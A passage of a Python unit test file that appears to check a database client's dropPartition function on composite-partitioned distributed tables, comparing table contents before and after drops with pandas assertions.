assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level3_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level3_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_value_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
